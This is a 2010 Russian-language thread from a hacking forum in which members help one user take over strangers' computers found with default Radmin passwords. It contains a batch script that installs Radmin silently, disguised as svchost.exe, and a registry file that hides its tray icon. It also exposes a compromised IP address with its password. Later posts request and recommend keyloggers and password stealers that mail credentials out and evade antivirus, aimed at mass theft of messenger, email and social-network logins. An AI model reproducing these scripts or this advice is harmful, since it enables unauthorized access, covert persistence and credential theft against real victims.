Форум АНТИЧАТ - Подскажите пожалуйста (Radmin)

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Подскажите пожалуйста (Radmin) (https://forum.antichat.xyz/showthread.php?t=169990)

nitr00

11.01.2010 16:41

Подскажите пожалуйста (Radmin)

дело в том что я сканировал IP на 4899 порт,нашел много открытых пароли по стандарту 1-8
так вот суть проблемы в том , что мне надо данный радмин удалить и залить свой не видемый.Радмин этот я удалял после чего заливал свой запускал при коннекте писало нет соединения и так постоянно.
Как поступить?Прошу вас о помощи
Заранее благодарен

-=lebed=-

11.01.2010 16:53

Пиши как удалял, как потом свой заливал (через чего). Невидимый - это что имеется ввиду иконка в трее или в процессах невидимый. Тут вопросов больше чем ответов пока...

nitr00

11.01.2010 17:50

удалял через установку и удаление
всеровно значек в треи числился я в реестре удалил его значка не было
заранее был залит бекдор xcontrol
с помощью него свой заливал и запускал
да невидимый значит не в треи ни в диспетчере нету =)

CyberHunter

11.01.2010 17:58

а ты его хоть запустил???

Цитата:

всеровно значек в треи числился я в реестре удалил его значка не было

и после этого его не видно ни в трее ни в диспетчере?

nitr00

11.01.2010 18:58

да не видно,
свой я запустил как и писал через xcontrol
и не коннектит вообще =(((
выдает следуещее :
Соединение с 88.204.71.152
Ошибка TCP/IP или соединение закрыто.

cheater_man

11.01.2010 19:39

Короче поступаешь так:
1.Устанавливаешь свой радмин.
2.Удаляешь чужой радин.
3.конектишься.
Это же все злементарно :)

nitr00

11.01.2010 20:08

ути умник какой xDD
свой устанавливаю вылетает Ошибка TCP/IP или соединение закрыто.
все =))
даже не успел удалить старый как такое вылетело
Хотя если ставить радмин мой через шелл то все нормально
тоесть я сделал выводы что каким то образом старый радмин мешает
но как быть в этой ситтуации?

cheater_man

11.01.2010 21:58

Цитата:

Сообщение от nitr00

Кинь сюда батник которым инсталишь.
И короче чувак хорош дедов тем более не своих тырить их же люди в разных целях используют, а ты нам подсираешь. Я сам когда ломаю серв всегда ставлю пароль 1-8. Потому-что о людях забочусь(тоесть о нас хакерах). Так что хорош фигней страдать. Или мы можем созлиться :mad: Ну ты понял ДА?

nitr00

11.01.2010 22:05

http://dump.ru/file/4118753

Krist_ALL

11.01.2010 22:08

Если обычный радмин висит нафига еще один? Юзаю какой был до тебя.

cheater_man

11.01.2010 22:13

Цитата:

Сообщение от nitr00

http://dump.ru/file/4118753

Это твой

Код:

@echo off

rename core.dll svchost.exe

rename vmode.dll admdll.dll

rename vdrv.srt raddrv.dll

REG delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f

copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe" 

copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"

copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"

reg import settings.reg

"%SYSTEMROOT%/svchost.exe" /install /silence

"%SYSTEMROOT%/svchost.exe" /start

А ты уверен что файлы у тебя скопированы в папку windows?

cheater_man

11.01.2010 22:15

Цитата:

Сообщение от nitr00

Да действительно странная мессага

Код:

Соединение с 88.204.71.152

Ошибка TCP/IP или соединение закрыто

Сам пробовал коннектился :confused:

nitr00

11.01.2010 22:15

тот в треи числиться и в процессах а который у меня нет!

cheater_man

11.01.2010 22:18

Цитата:

Сообщение от nitr00

тот в треи числиться и в процессах а который у меня нет!

Кинька какой нибудь ип со стандартным пассом. Попробую сам перебью.

lEh	11.01.2010 22:19

А радмин версия какая может просто иконку в три отрубить??? И если свой кидаеш процес переименуй и порт другой паставь.

nitr00

11.01.2010 22:20

ребят я очень далеко от вас живу очень )) дай бог чтоб получился коннект
а так без проблем
88.204.20.82
12345678

И вот еще ктонибудь может кейлоггер посоветовать хороший чтобы на мыло пароли высылал
а еще лучше что то типо Lan_keylogger
только бы с кряком )
заранее благодарствую

cheater_man

11.01.2010 22:23

Цитата:

Сообщение от nitr00

И вот еще ктонибудь может кейлоггер посоветовать хороший чтобы на мыло пароли высылал
а еще лучше что то типо Lan_keylogger
только бы с кряком )
заранее благодарствую

чувак для этого есть MPR

Цитата:

ребят я очень далеко от вас живу очень )) дай бог чтоб получился коннект
а так без проблем
88.204.20.82
12345678

Ты походу полохо усвоил что такие инет и TCP :) Да я подконнектился к твоему ип :) Блин пинг больно большой :)

nitr00

11.01.2010 22:30

[QUOTE=cheater_man]чувак для этого есть MPR

разве он пойдет на удаленке?

[Life]

11.01.2010 22:30

Цитата:

Сообщение от nitr00

http://dump.ru/file/4118753

ошибка. нахимичил что-то

cheater_man

11.01.2010 22:31

[QUOTE=nitr00]

Цитата:

Сообщение от cheater_man

чувак для этого есть MPR

разве он пойдет на удаленке?

На удаленке не пойдет. Тебе какие именно пассы нажны(от чего)?
Если что эти дедики используют для доступа в сеть этого провайдера.

nitr00

11.01.2010 22:35

мне бы кейлоггер чтобы воровать от аськи,мыла,одноклассники ну и тд =))
тоесть все то чем пользуються ламеры с открытыми 4899 портами xDDD
Желательно даже не чтоб на мыло кидал а чтоб в проге самой у меня и показывал куда он выходил когда логин пароль
тоесть так =)

lEh	11.01.2010 22:37

Ну можно пароли по другому вытащить. Допустим из браузера итп.

nitr00

11.01.2010 22:39

келоггер интересен именно =)
ибо не один десяток людей надо обработать
да и не два =))
в общем людей тьма вот кейлоггеры накидал и ждешь
пусть даже антивирусы видят их это значения не имеет
отключу гг )

cheater_man

11.01.2010 22:40

Цитата:

Сообщение от nitr00

Конечно можно всадить Pinch 3 например(только его уже давно не обновляли, и его надо криптовать, тоесть проблем куча!).Ну а мне кажется лучше MPR.
Если например жертва пользуется OPERA, то нужно скопировать себе на комп файл wand.dat(вроде :) ) и открыть его MPR. Вообщето сам как хочешь делай, я например MPR пассы вскрывал :D

nitr00

11.01.2010 22:44

кроме пинча нету нечего стоящего?
а то доверия не внушает после прочтения отзывов

cheater_man

11.01.2010 22:47

Да вот кстати

Код:

Windows Registry Editor Version 5.00



[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]



[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]



[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]



[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]



[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]

"NTAuthEnabled"=hex:00,00,00,00

"Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce,1a

"DisableTrayIcon"=hex:01,00,00,00

"Port"=hex:23,13,00,00

"EnableLogFile"=hex:00,00,00,00

"LogFilePath"="c:\\logfile.txt"

"FilterIp"=hex:00,00,00,00

"AskUser"=hex:00,00,00,00



[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType]

"Data"=hex:95,f3,0b,13,44,c0,10,74,7b,2e,83,2c,f5,89,e4,b9,49,c8,49,00,1c,eb,\

  18,64,87,46,c5,78,59,73,2a,6a,13,72,53,9e,e4,f5,74,94,4f,49,42,46,f7,ab,05,\

  1f,55,24,72,79,e9,85,c8,8a,1e,5e,e3,d8,35,70,06,28

Скрывает радмин :D

nitr00

11.01.2010 22:48

спасибо
а на той машинке которую я в пример привел попробовать можешь??

cheater_man

11.01.2010 22:49

Цитата:

Сообщение от nitr00

кроме пинча нету нечего стоящего?
а то доверия не внушает после прочтения отзывов

Я хз давно кражей пассов не занимался. Я те говорю MPR в руки, тебе почти каждый 3-ий так скажет :)

nitr00

11.01.2010 22:51

это печально
но спасибо за помощь!!!

cheater_man

11.01.2010 23:00

Цитата:

Сообщение от nitr00

спасибо
а на той машинке которую я в пример привел попробовать можешь??

да смогу. Только надо смотреть ключи реестра.

nitr00

11.01.2010 23:56

ребят посоветуйте кейлоггер на удаленку пожалуйста
пусть даже старый , палиться антивирусами и прочии траблы
подойдет любой отсылающий пароли на мыло или же что еше лучше показывает в проге у тебя на мониторе так же как и в Lan_keylogger
благодарю заранее

[Life]

12.01.2010 00:24

AnyKEYLOGGEN - хороший мало чем палится
попробуй) :)

ant00xa

13.01.2010 21:38

Lethal Keylogger FREE - отсылает отчеты на gmail, каспером и нодом не палится)))

Время: 06:01